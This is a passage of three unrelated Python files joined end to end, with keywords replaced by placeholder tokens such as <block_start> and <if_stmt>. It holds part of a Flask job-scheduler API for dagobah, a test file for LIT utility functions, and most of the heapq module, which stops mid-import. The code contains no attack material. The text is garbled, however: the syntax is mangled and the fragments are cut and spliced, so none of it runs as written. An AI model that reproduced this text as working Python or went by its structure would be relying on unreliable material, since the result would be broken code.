task_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.delete_task(args['task_name'])<block_end>@app.route('/api/add_dependency' methods=['POST'])@login_required@api_call<def_stmt>add_dependency <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'from_task_name' 'to_task_name'] job_name=str from_task_name=str to_task_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.add_dependency(args['from_task_name'] args['to_task_name'])<block_end>@app.route('/api/delete_dependency' methods=['POST'])@login_required@api_call<def_stmt>delete_dependency <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'from_task_name' 'to_task_name'] job_name=str from_task_name=str to_task_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.delete_dependency(args['from_task_name'] args['to_task_name'])<block_end>@app.route('/api/schedule_job' methods=['POST'])@login_required@api_call<def_stmt>schedule_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'cron_schedule'] job_name=str cron_schedule=str)<block_start>abort(400)<block_end><if_stmt>args['cron_schedule']<eq>''<block_start>args['cron_schedule']=<none><block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.schedule(args['cron_schedule'])<block_end>@app.route('/api/stop_scheduler' methods=['POST'])@login_required@api_call<def_stmt>stop_scheduler <block_start>dagobah.scheduler.stop()<block_end>@app.route('/api/restart_scheduler' methods=['POST'])@login_required@api_call<def_stmt>restart_scheduler <block_start>dagobah.scheduler.restart()<block_end>@app.route('/api/terminate_all_tasks' methods=['POST'])@login_required@api_call<def_stmt>terminate_all_tasks <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.terminate_all()<block_end>@app.route('/api/kill_all_tasks' methods=['POST'])@login_required@api_call<def_stmt>kill_all_tasks <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.kill_all()<block_end>@app.route('/api/terminate_task' methods=['POST'])@login_required@api_call<def_stmt>terminate_task <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str task_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end>task.terminate()<block_end>@app.route('/api/kill_task' methods=['POST'])@login_required@api_call<def_stmt>kill_task <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str task_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end>task.kill()<block_end>@app.route('/api/edit_job' methods=['POST'])@login_required@api_call<def_stmt>edit_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<del_stmt>args['job_name']<line_sep>job.edit(**args)<block_end>@app.route('/api/update_job_notes' methods=['POST'])@login_required@api_call<def_stmt>update_job_notes <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'notes'] job_name=str notes=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.update_job_notes(args['notes'])<block_end>@app.route('/api/edit_task' methods=['POST'])@login_required@api_call<def_stmt>edit_task <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str task_name=str name=str command=str soft_timeout=int hard_timeout=int hostname=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end># validate host <if_stmt>'hostname'<in>args<and>args.get('hostname')<not><in>dagobah.get_hosts()# Check for empty host, if so then task is no longer remote <block_start><if_stmt><not>args.get('hostname')<block_start>args['hostname']=<none><block_end><else_stmt><block_start>abort(400)<block_end><block_end><del_stmt>args['job_name']<del_stmt>args['task_name']<line_sep>job.edit_task(task.name **args)<block_end>@app.route('/api/set_soft_timeout' methods=['POST'])@login_required@api_call<def_stmt>set_soft_timeout <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_name' 'soft_timeout'] job_name=str task_name=str soft_timeout=int)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end>task.set_soft_timeout(args['soft_timeout'])<block_end>@app.route('/api/set_hard_timeout' methods=['POST'])@login_required@api_call<def_stmt>set_hard_timeout <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_name' 'hard_timeout'] job_name=str task_name=str hard_timeout=int)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end>task.set_hard_timeout(args['hard_timeout'])<block_end>@app.route('/api/export_job' methods=['GET'])@login_required<def_stmt>export_job <block_start>args=dict(request.args)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>to_send=StringIO.StringIO()<line_sep>to_send.write(json.dumps(job._serialize(strict_json=<true>)))<line_sep>to_send.write('\n')<line_sep>to_send.seek(0)<line_sep><return>send_file(to_send attachment_filename='%s.json'%job.name as_attachment=<true>)<block_end>@app.route('/api/import_job' methods=['POST'])@login_required@api_call<def_stmt>import_job <block_start>file=request.files['file']<if_stmt>(file<and>allowed_file(file.filename ['json']))<block_start>dagobah.add_job_from_json(file.read() destructive=<true>)<block_end><block_end>@app.route('/api/hosts' methods=['GET'])@login_required@api_call<def_stmt>get_hosts <block_start><return>dagobah.get_hosts()<block_end>
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # Lint as: python3 """Tests for lit_nlp.lib.utils."""<import_from_stmt>absl.testing absltest<import_from_stmt>lit_nlp.api types<import_from_stmt>lit_nlp.lib utils<class_stmt>UtilsTest(absltest.TestCase)<block_start><def_stmt>test_coerce_bool self<block_start>self.assertTrue(utils.coerce_bool(<true>))<line_sep>self.assertTrue(utils.coerce_bool(1))<line_sep>self.assertTrue(utils.coerce_bool(2.2))<line_sep>self.assertTrue(utils.coerce_bool(<true>))<line_sep>self.assertTrue(utils.coerce_bool([0]))<line_sep>self.assertTrue(utils.coerce_bool({"a":"hi"}))<line_sep>self.assertTrue(utils.coerce_bool("this is true"))<line_sep>self.assertFalse(utils.coerce_bool(""))<line_sep>self.assertFalse(utils.coerce_bool(0))<line_sep>self.assertFalse(utils.coerce_bool("0"))<line_sep>self.assertFalse(utils.coerce_bool(<false>))<line_sep>self.assertFalse(utils.coerce_bool("false"))<line_sep>self.assertFalse(utils.coerce_bool("False"))<line_sep>self.assertFalse(utils.coerce_bool({}))<line_sep>self.assertFalse(utils.coerce_bool([]))<block_end><def_stmt>test_find_keys self<block_start>d={"a":<true> "b":<false> "c":<true>}<line_sep>self.assertEqual(["a" "c"] utils.find_keys(d <lambda>a:a))<line_sep>self.assertEqual([] utils.find_keys(d <lambda>a:a<eq>"nothing"))<line_sep>self.assertEqual([] utils.find_keys({} <lambda>a:a))<block_end><def_stmt>test_find_spec_keys self<block_start>spec={"score":types.RegressionScore() "scalar_foo":types.Scalar() "text":types.TextSegment() "emb_0":types.Embeddings() "emb_1":types.Embeddings() "tokens":types.Tokens() "generated_text":types.GeneratedText() }<line_sep>self.assertEqual(["score"] utils.find_spec_keys(spec types.RegressionScore))<line_sep>self.assertEqual(["text" "tokens" "generated_text"] utils.find_spec_keys(spec (types.TextSegment types.Tokens)))<line_sep>self.assertEqual(["emb_0" "emb_1"] utils.find_spec_keys(spec types.Embeddings))<line_sep>self.assertEqual([] utils.find_spec_keys(spec types.AttentionHeads))<line_sep># Check subclasses self.assertEqual(list(spec.keys()) utils.find_spec_keys(spec types.LitType))<line_sep>self.assertEqual(["text" "generated_text"] utils.find_spec_keys(spec types.TextSegment))<line_sep>self.assertEqual(["score" "scalar_foo"] utils.find_spec_keys(spec types.Scalar))<block_end><def_stmt>test_filter_by_keys self<block_start>pred=<lambda>k:k<eq>"a"<or>k<eq>"b"<line_sep>d={"a":<true> "b":<false> "c":<true>}<line_sep>self.assertDictEqual({"a":<true> "b":<false>} utils.filter_by_keys(d pred))<line_sep>d2={"1":<true> "2":<false> "3":<true>}<line_sep>self.assertDictEqual({} utils.filter_by_keys(d2 pred))<line_sep>self.assertDictEqual({} utils.filter_by_keys({} pred))<block_end><def_stmt>test_copy_and_update self<block_start>d={"a":<true> "b":<false> "c":<true>}<line_sep>update={"a":<false> "b":<true>}<line_sep>expected={"a":<false> "b":<true> "c":<true>}<line_sep>self.assertDictEqual(expected utils.copy_and_update(d update))<line_sep>d={"a":<true> "b":<false> }<line_sep>update={"a":<false> "c":<true>}<line_sep>expected={"a":<false> "b":<false> "c":<true>}<line_sep>self.assertDictEqual(expected utils.copy_and_update(d update))<line_sep>d={"a":<true> "b":<false> }<line_sep>update={}<line_sep>self.assertDictEqual(d utils.copy_and_update(d update))<line_sep>d={}<line_sep>update={"a":<false> "c":<true>}<line_sep>self.assertDictEqual(update utils.copy_and_update(d update))<block_end><def_stmt>test_remap_dict self<block_start>d={"a":<true> "b":<false> "c":<true>}<line_sep>remap_dict={"a":"a2" "b":"b2"}<line_sep>expected={"a2":<true> "b2":<false> "c":<true>}<line_sep>self.assertDictEqual(expected utils.remap_dict(d remap_dict))<line_sep>d={"a":<true> "b":<false> "c":<true>}<line_sep>remap_dict={}<line_sep>self.assertDictEqual(d utils.remap_dict(d remap_dict))<line_sep>d={}<line_sep>remap_dict={"a":"a2" "b":"b2"}<line_sep>self.assertDictEqual(d utils.remap_dict(d remap_dict))<line_sep>d={"a":<true> "b":<false> "c":<true>}<line_sep>remap_dict={"a":"b" }<line_sep>expected={"b":<false> "c":<true>}<line_sep>self.assertDictEqual(expected utils.remap_dict(d remap_dict))<block_end><def_stmt>test_find_all_combinations self<block_start>l=[1 2 3 4]<line_sep>combinations=utils.find_all_combinations(l min_element_count=2 max_element_count=3)<line_sep>expected=[[1 2] [1 3] [1 4] [2 3] [2 4] [3 4] [1 2 3] [1 2 4] [1 3 4] [2 3 4]]<line_sep>self.assertListEqual(combinations expected)<block_end><def_stmt>test_find_all_combinations_max_is_greater_than_len self<block_start>l=[1 2 3 4]<line_sep>combinations=utils.find_all_combinations(l min_element_count=2 max_element_count=10)<line_sep>expected=[[1 2] [1 3] [1 4] [2 3] [2 4] [3 4] [1 2 3] [1 2 4] [1 3 4] [2 3 4] [1 2 3 4]]<line_sep>self.assertListEqual(combinations expected)<block_end><def_stmt>test_find_all_combinations_min_is_greater_than_max self<block_start>l=[1 2 3 4]<line_sep>combinations=utils.find_all_combinations(l min_element_count=3 max_element_count=2)<line_sep>expected=[]<line_sep>self.assertListEqual(combinations expected)<block_end><def_stmt>test_find_all_combinations_min_is_negative self<block_start>l=[1 2 3 4]<line_sep>combinations=utils.find_all_combinations(l min_element_count=-1 max_element_count=2)<line_sep>expected=[[1] [2] [3] [4] [1 2] [1 3] [1 4] [2 3] [2 4] [3 4]]<line_sep>self.assertListEqual(combinations expected)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>absltest.main()<block_end>
"""Heap queue algorithm (a.k.a. priority queue). Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for all k, counting elements from 0. For the sake of comparison, non-existing elements are considered to be infinite. The interesting property of a heap is that a[0] is always its smallest element. Usage: heap = [] # creates an empty heap heappush(heap, item) # pushes a new item on the heap item = heappop(heap) # pops the smallest item from the heap item = heap[0] # smallest item on the heap without popping it heapify(x) # transforms list into a heap, in-place, in linear time item = heapreplace(heap, item) # pops and returns smallest item, and adds # new item; the heap size is unchanged Our API differs from textbook heap algorithms as follows: - We use 0-based indexing. This makes the relationship between the index for a node and the indexes for its children slightly less obvious, but is more suitable since Python uses 0-based indexing. - Our heappop() method returns the smallest item, not the largest. These two make it possible to view the heap as a regular Python list without surprises: heap[0] is the smallest item, and heap.sort() maintains the heap invariant! """<line_sep># Original code by <NAME>, augmented by <NAME> and <NAME> __about__="""Heap queues [explanation by <NAME>] Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for all k, counting elements from 0. For the sake of comparison, non-existing elements are considered to be infinite. The interesting property of a heap is that a[0] is always its smallest element. The strange invariant above is meant to be an efficient memory representation for a tournament. The numbers below are `k', not a[k]: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 In the tree above, each cell `k' is topping `2*k+1' and `2*k+2'. In an usual binary tournament we see in sports, each cell is the winner over the two cells it tops, and we can trace the winner down the tree to see all opponents s/he had. However, in many computer applications of such tournaments, we do not need to trace the history of a winner. To be more memory efficient, when a winner is promoted, we try to replace it by something else at a lower level, and the rule becomes that a cell and the two cells it tops contain three different items, but the top cell "wins" over the two topped cells. If this heap invariant is protected at all time, index 0 is clearly the overall winner. The simplest algorithmic way to remove it and find the "next" winner is to move some loser (let's say cell 30 in the diagram above) into the 0 position, and then percolate this new 0 down the tree, exchanging values, until the invariant is re-established. This is clearly logarithmic on the total number of items in the tree. By iterating over all items, you get an O(n ln n) sort. A nice feature of this sort is that you can efficiently insert new items while the sort is going on, provided that the inserted items are not "better" than the last 0'th element you extracted. This is especially useful in simulation contexts, where the tree holds all incoming events, and the "win" condition means the smallest scheduled time. When an event schedule other events for execution, they are scheduled into the future, so they can easily go into the heap. So, a heap is a good structure for implementing schedulers (this is what I used for my MIDI sequencer :-). Various structures for implementing schedulers have been extensively studied, and heaps are good for this, as they are reasonably speedy, the speed is almost constant, and the worst case is not much different than the average case. However, there are other representations which are more efficient overall, yet the worst cases might be terrible. Heaps are also very useful in big disk sorts. You most probably all know that a big sort implies producing "runs" (which are pre-sorted sequences, which size is usually related to the amount of CPU memory), followed by a merging passes for these runs, which merging is often very cleverly organised[1]. It is very important that the initial sort produces the longest runs possible. Tournaments are a good way to that. If, using all the memory available to hold a tournament, you replace and percolate items that happen to fit the current run, you'll produce runs which are twice the size of the memory for random input, and much better for input fuzzily ordered. Moreover, if you output the 0'th item on disk and get an input which may not fit in the current tournament (because the value "wins" over the last output value), it cannot fit in the heap, so the size of the heap decreases. The freed memory could be cleverly reused immediately for progressively building a second heap, which grows at exactly the same rate the first heap is melting. When the first heap completely vanishes, you switch heaps and start a new run. Clever and quite effective! In a word, heaps are useful memory structures to know. I use them in a few applications, and I think it is good to keep a `heap' module around. :-) -------------------- [1] The disk balancing algorithms which are current, nowadays, are more annoying than clever, and this is a consequence of the seeking capabilities of the disks. On devices which cannot seek, like big tape drives, the story was quite different, and one had to be very clever to ensure (far in advance) that each tape movement will be the most effective possible (that is, will best participate at "progressing" the merge). Some tapes were even able to read backwards, and this was also used to avoid the rewinding time. Believe me, real good tape sorts were quite spectacular to watch! From all times, sorting has always been a Great Art! :-) """<line_sep>__all__=['heappush' 'heappop' 'heapify' 'heapreplace' 'merge' 'nlargest' 'nsmallest' 'heappushpop']<def_stmt>heappush heap item<block_start>"""Push item onto heap, maintaining the heap invariant."""<line_sep>heap.append(item)<line_sep>_siftdown(heap 0 len(heap)-1)<block_end><def_stmt>heappop heap<block_start>"""Pop the smallest item off the heap, maintaining the heap invariant."""<line_sep>lastelt=heap.pop()# raises appropriate IndexError if heap is empty <if_stmt>heap<block_start>returnitem=heap[0]<line_sep>heap[0]=lastelt<line_sep>_siftup(heap 0)<line_sep><return>returnitem<block_end><return>lastelt<block_end><def_stmt>heapreplace heap item<block_start>"""Pop and return the current smallest value, and add the new item. This is more efficient than heappop() followed by heappush(), and can be more appropriate when using a fixed-size heap. Note that the value returned may be larger than item! That constrains reasonable uses of this routine unless written as part of a conditional replacement: if item > heap[0]: item = heapreplace(heap, item) """<line_sep>returnitem=heap[0]# raises appropriate IndexError if heap is empty heap[0]=item<line_sep>_siftup(heap 0)<line_sep><return>returnitem<block_end><def_stmt>heappushpop heap item<block_start>"""Fast version of a heappush followed by a heappop."""<if_stmt>heap<and>heap[0]<l>item<block_start>item,heap[0]=heap[0] item<line_sep>_siftup(heap 0)<block_end><return>item<block_end><def_stmt>heapify x<block_start>"""Transform list into a heap, in-place, in O(len(x)) time."""<line_sep>n=len(x)<line_sep># Transform bottom-up. The largest index there's any point to looking at # is the largest with a child index in-range, so must have 2*i + 1 < n, # or i < (n-1)/2. If n is even = 2*j, this is (2*j-1)/2 = j-1/2 so # j-1 is the largest, which is n//2 - 1. If n is odd = 2*j+1, this is # (2*j+1-1)/2 = j so j-1 is the largest, and that's again n//2-1. <for_stmt>i reversed(range(n<floordiv>2))<block_start>_siftup(x i)<block_end><block_end><def_stmt>_heappop_max heap<block_start>"""Maxheap version of a heappop."""<line_sep>lastelt=heap.pop()# raises appropriate IndexError if heap is empty <if_stmt>heap<block_start>returnitem=heap[0]<line_sep>heap[0]=lastelt<line_sep>_siftup_max(heap 0)<line_sep><return>returnitem<block_end><return>lastelt<block_end><def_stmt>_heapreplace_max heap item<block_start>"""Maxheap version of a heappop followed by a heappush."""<line_sep>returnitem=heap[0]# raises appropriate IndexError if heap is empty heap[0]=item<line_sep>_siftup_max(heap 0)<line_sep><return>returnitem<block_end><def_stmt>_heapify_max x<block_start>"""Transform list into a maxheap, in-place, in O(len(x)) time."""<line_sep>n=len(x)<for_stmt>i reversed(range(n<floordiv>2))<block_start>_siftup_max(x i)<block_end><block_end># 'heap' is a heap at all indices >= startpos, except possibly for pos. pos # is the index of a leaf with a possibly out-of-order value. Restore the # heap invariant. <def_stmt>_siftdown heap startpos pos<block_start>newitem=heap[pos]<line_sep># Follow the path to the root, moving parents down until finding a place # newitem fits. <while_stmt>pos<g>startpos<block_start>parentpos=(pos-1)<rshift>1<line_sep>parent=heap[parentpos]<if_stmt>newitem<l>parent<block_start>heap[pos]=parent<line_sep>pos=parentpos<line_sep><continue><block_end><break><block_end>heap[pos]=newitem<block_end># The child indices of heap index pos are already heaps, and we want to make # a heap at index pos too. We do this by bubbling the smaller child of # pos up (and so on with that child's children, etc) until hitting a leaf, # then using _siftdown to move the oddball originally at index pos into place. # # We *could* break out of the loop as soon as we find a pos where newitem <= # both its children, but turns out that's not a good idea, and despite that # many books write the algorithm that way. During a heap pop, the last array # element is sifted in, and that tends to be large, so that comparing it # against values starting from the root usually doesn't pay (= usually doesn't # get us out of the loop early). See Knuth, Volume 3, where this is # explained and quantified in an exercise. # # Cutting the # of comparisons is important, since these routines have no # way to extract "the priority" from an array element, so that intelligence # is likely to be hiding in custom comparison methods, or in array elements # storing (priority, record) tuples. Comparisons are thus potentially # expensive. # # On random arrays of length 1000, making this change cut the number of # comparisons made by heapify() a little, and those made by exhaustive # heappop() a lot, in accord with theory. Here are typical results from 3 # runs (3 just to demonstrate how small the variance is): # # Compares needed by heapify Compares needed by 1000 heappops # -------------------------- -------------------------------- # 1837 cut to 1663 14996 cut to 8680 # 1855 cut to 1659 14966 cut to 8678 # 1847 cut to 1660 15024 cut to 8703 # # Building the heap by using heappush() 1000 times instead required # 2198, 2148, and 2219 compares: heapify() is more efficient, when # you can use it. # # The total compares needed by list.sort() on the same lists were 8627, # 8627, and 8632 (this should be compared to the sum of heapify() and # heappop() compares): list.sort() is (unsurprisingly!) more efficient # for sorting. <def_stmt>_siftup heap pos<block_start>endpos=len(heap)<line_sep>startpos=pos<line_sep>newitem=heap[pos]<line_sep># Bubble up the smaller child until hitting a leaf. childpos=2<times>pos+1# leftmost child position <while_stmt>childpos<l>endpos# Set childpos to index of smaller child. <block_start>rightpos=childpos+1<if_stmt>rightpos<l>endpos<and><not>heap[childpos]<l>heap[rightpos]<block_start>childpos=rightpos<block_end># Move the smaller child up. heap[pos]=heap[childpos]<line_sep>pos=childpos<line_sep>childpos=2<times>pos+1<block_end># The leaf at pos is empty now. Put newitem there, and bubble it up # to its final resting place (by sifting its parents down). heap[pos]=newitem<line_sep>_siftdown(heap startpos pos)<block_end><def_stmt>_siftdown_max heap startpos pos<block_start>'Maxheap variant of _siftdown'<line_sep>newitem=heap[pos]<line_sep># Follow the path to the root, moving parents down until finding a place # newitem fits. <while_stmt>pos<g>startpos<block_start>parentpos=(pos-1)<rshift>1<line_sep>parent=heap[parentpos]<if_stmt>parent<l>newitem<block_start>heap[pos]=parent<line_sep>pos=parentpos<line_sep><continue><block_end><break><block_end>heap[pos]=newitem<block_end><def_stmt>_siftup_max heap pos<block_start>'Maxheap variant of _siftup'<line_sep>endpos=len(heap)<line_sep>startpos=pos<line_sep>newitem=heap[pos]<line_sep># Bubble up the larger child until hitting a leaf. childpos=2<times>pos+1# leftmost child position <while_stmt>childpos<l>endpos# Set childpos to index of larger child. <block_start>rightpos=childpos+1<if_stmt>rightpos<l>endpos<and><not>heap[rightpos]<l>heap[childpos]<block_start>childpos=rightpos<block_end># Move the larger child up. heap[pos]=heap[childpos]<line_sep>pos=childpos<line_sep>childpos=2<times>pos+1<block_end># The leaf at pos is empty now. Put newitem there, and bubble it up # to its final resting place (by sifting its parents down). heap[pos]=newitem<line_sep>_siftdown_max(heap startpos pos)<block_end><def_stmt>merge *iterables key=<none> reverse=<false><block_start>'''Merge multiple sorted inputs into a single sorted output. Similar to sorted(itertools.chain(*iterables)) but returns a generator, does not pull the data into memory all at once, and assumes that each of the input streams is already sorted (smallest to largest). >>> list(merge([1,3,5,7], [0,2,4,8], [5,10,15,20], [], [25])) [0, 1, 2, 3, 4, 5, 5, 7, 8, 10, 15, 20, 25] If *key* is not None, applies a key function to each element to determine its sort order. >>> list(merge(['dog', 'horse'], ['cat', 'fish', 'kangaroo'], key=len)) ['dog', 'cat', 'fish', 'horse', 'kangaroo'] '''<line_sep>h=[]<line_sep>h_append=h.append<if_stmt>reverse<block_start>_heapify=_heapify_max<line_sep>_heappop=_heappop_max<line_sep>_heapreplace=_heapreplace_max<line_sep>direction=-1<block_end><else_stmt><block_start>_heapify=heapify<line_sep>_heappop=heappop<line_sep>_heapreplace=heapreplace<line_sep>direction=1<block_end><if_stmt>key<is><none><block_start><for_stmt>order,it enumerate(map(iter iterables))<block_start><try_stmt><block_start>next=it.__next__<line_sep>h_append([next() order<times>direction next])<block_end><except_stmt>StopIteration<block_start><pass><block_end><block_end>_heapify(h)<while_stmt>len(h)<g>1<block_start><try_stmt><block_start><while_stmt><true><block_start>value,order,next=s=h[0]<line_sep><yield>value<line_sep>s[0]=next()# raises StopIteration when exhausted _heapreplace(h s)# restore heap condition <block_end><block_end><except_stmt>StopIteration<block_start>_heappop(h)# remove empty iterator <block_end><block_end><if_stmt>h# fast case when only a single iterator remains <block_start>value,order,next=h[0]<line_sep><yield>value<line_sep><yield><from>next.__self__<block_end><return><block_end><for_stmt>order,it enumerate(map(iter iterables))<block_start><try_stmt><block_start>next=it.__next__<line_sep>value=next()<line_sep>h_append([key(value) order<times>direction value next])<block_end><except_stmt>StopIteration<block_start><pass><block_end><block_end>_heapify(h)<while_stmt>len(h)<g>1<block_start><try_stmt><block_start><while_stmt><true><block_start>key_value,order,value,next=s=h[0]<line_sep><yield>value<line_sep>value=next()<line_sep>s[0]=key(value)<line_sep>s[2]=value<line_sep>_heapreplace(h s)<block_end><block_end><except_stmt>StopIteration<block_start>_heappop(h)<block_end><block_end><if_stmt>h<block_start>key_value,order,value,next=h[0]<line_sep><yield>value<line_sep><yield><from>next.__self__<block_end><block_end># Algorithm notes for nlargest() and nsmallest() # ============================================== # # Make a single pass over the data while keeping the k most extreme values # in a heap. Memory consumption is limited to keeping k values in a list. # # Measured performance for random inputs: # # number of comparisons # n inputs k-extreme values (average of 5 trials) % more than min() # ------------- ---------------- --------------------- ----------------- # 1,000 100 3,317 231.7% # 10,000 100 14,046 40.5% # 100,000 100 105,749 5.7% # 1,000,000 100 1,007,751 0.8% # 10,000,000 100 10,009,401 0.1% # # Theoretical number of comparisons for k smallest of n random inputs: # # Step Comparisons Action # ---- -------------------------- --------------------------- # 1 1.66 * k heapify the first k-inputs # 2 n - k compare remaining elements to top of heap # 3 k * (1 + lg2(k)) * ln(n/k) replace the topmost value on the heap # 4 k * lg2(k) - (k/2) final sort of the k most extreme values # # Combining and simplifying for a rough estimate gives: # # comparisons = n + k * (log(k, 2) * log(n/k) + log(k, 2) + log(n/k)) # # Computing the number of comparisons for step 3: # ----------------------------------------------- # * For the i-th new value from the iterable, the probability of being in the # k most extreme values is k/i. For example, the probability of the 101st # value seen being in the 100 most extreme values is 100/101. # * If the value is a new extreme value, the cost of inserting it into the # heap is 1 + log(k, 2). # * The probability times the cost gives: # (k/i) * (1 + log(k, 2)) # * Summing across the remaining n-k elements gives: # sum((k/i) * (1 + log(k, 2)) for i in range(k+1, n+1)) # * This reduces to: # (H(n) - H(k)) * k * (1 + log(k, 2)) # * Where H(n) is the n-th harmonic number estimated by: # gamma = 0.5772156649 # H(n) = log(n, e) + gamma + 1 / (2 * n) # http://en.wikipedia.org/wiki/Harmonic_series_(mathematics)#Rate_of_divergence # * Substituting the H(n) formula: # comparisons = k * (1 + log(k, 2)) * (log(n/k, e) + (1/n - 1/k) / 2) # # Worst-case for step 3: # ---------------------- # In the worst case, the input data is reversed sorted so that every new element # must be inserted in the heap: # # comparisons = 1.66 * k + log(k, 2) * (n - k) # # Alternative Algorithms # ---------------------- # Other algorithms were not used because they: # 1) Took much more auxiliary memory, # 2) Made multiple passes over the data. # 3) Made more comparisons in common cases (small k, large n, semi-random input). # See the more detailed comparison of approach at: # http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallest <def_stmt>nsmallest n iterable key=<none><block_start>"""Find the n smallest elements in a dataset. Equivalent to: sorted(iterable, key=key)[:n] """<line_sep># Short-cut for n==1 is to use min() <if_stmt>n<eq>1<block_start>it=iter(iterable)<line_sep>sentinel=object()<if_stmt>key<is><none><block_start>result=min(it default=sentinel)<block_end><else_stmt><block_start>result=min(it default=sentinel key=key)<block_end><return>[]<if>result<is>sentinel<else>[result]<block_end># When n>=size, it's faster to use sorted() <try_stmt><block_start>size=len(iterable)<block_end><except_stmt>(TypeError AttributeError)<block_start><pass><block_end><else_stmt><block_start><if_stmt>n<ge>size<block_start><return>sorted(iterable key=key)[:n]<block_end><block_end># When key is none, use simpler decoration <if_stmt>key<is><none><block_start>it=iter(iterable)<line_sep># put the range(n) first so that zip() doesn't # consume one too many elements from the iterator result=[(elem i)<for>i,elem zip(range(n) it)]<if_stmt><not>result<block_start><return>result<block_end>_heapify_max(result)<line_sep>top=result[0][0]<line_sep>order=n<line_sep>_heapreplace=_heapreplace_max<for_stmt>elem it<block_start><if_stmt>elem<l>top<block_start>_heapreplace(result (elem order))<line_sep>top=result[0][0]<line_sep>order<augadd>1<block_end><block_end>result.sort()<line_sep><return>[r[0]<for>r result]<block_end># General case, slowest method it=iter(iterable)<line_sep>result=[(key(elem) i elem)<for>i,elem zip(range(n) it)]<if_stmt><not>result<block_start><return>result<block_end>_heapify_max(result)<line_sep>top=result[0][0]<line_sep>order=n<line_sep>_heapreplace=_heapreplace_max<for_stmt>elem it<block_start>k=key(elem)<if_stmt>k<l>top<block_start>_heapreplace(result (k order elem))<line_sep>top=result[0][0]<line_sep>order<augadd>1<block_end><block_end>result.sort()<line_sep><return>[r[2]<for>r result]<block_end><def_stmt>nlargest n iterable key=<none><block_start>"""Find the n largest elements in a dataset. Equivalent to: sorted(iterable, key=key, reverse=True)[:n] """<line_sep># Short-cut for n==1 is to use max() <if_stmt>n<eq>1<block_start>it=iter(iterable)<line_sep>sentinel=object()<if_stmt>key<is><none><block_start>result=max(it default=sentinel)<block_end><else_stmt><block_start>result=max(it default=sentinel key=key)<block_end><return>[]<if>result<is>sentinel<else>[result]<block_end># When n>=size, it's faster to use sorted() <try_stmt><block_start>size=len(iterable)<block_end><except_stmt>(TypeError AttributeError)<block_start><pass><block_end><else_stmt><block_start><if_stmt>n<ge>size<block_start><return>sorted(iterable key=key reverse=<true>)[:n]<block_end><block_end># When key is none, use simpler decoration <if_stmt>key<is><none><block_start>it=iter(iterable)<line_sep>result=[(elem i)<for>i,elem zip(range(0 -n -1) it)]<if_stmt><not>result<block_start><return>result<block_end>heapify(result)<line_sep>top=result[0][0]<line_sep>order=-n<line_sep>_heapreplace=heapreplace<for_stmt>elem it<block_start><if_stmt>top<l>elem<block_start>_heapreplace(result (elem order))<line_sep>top=result[0][0]<line_sep>order<augsub>1<block_end><block_end>result.sort(reverse=<true>)<line_sep><return>[r[0]<for>r result]<block_end># General case, slowest method it=iter(iterable)<line_sep>result=[(key(elem) i elem)<for>i,elem zip(range(0 -n -1) it)]<if_stmt><not>result<block_start><return>result<block_end>heapify(result)<line_sep>top=result[0][0]<line_sep>order=-n<line_sep>_heapreplace=heapreplace<for_stmt>elem it<block_start>k=key(elem)<if_stmt>top<l>k<block_start>_heapreplace(result (k order elem))<line_sep>top=result[0][0]<line_sep>order<augsub>1<block_end><block_end>result.sort(reverse=<true>)<line_sep><return>[r[2]<for>r result]<block_end># If available, use C implementation <try_stmt><block_start><import_from_stmt>_heapq 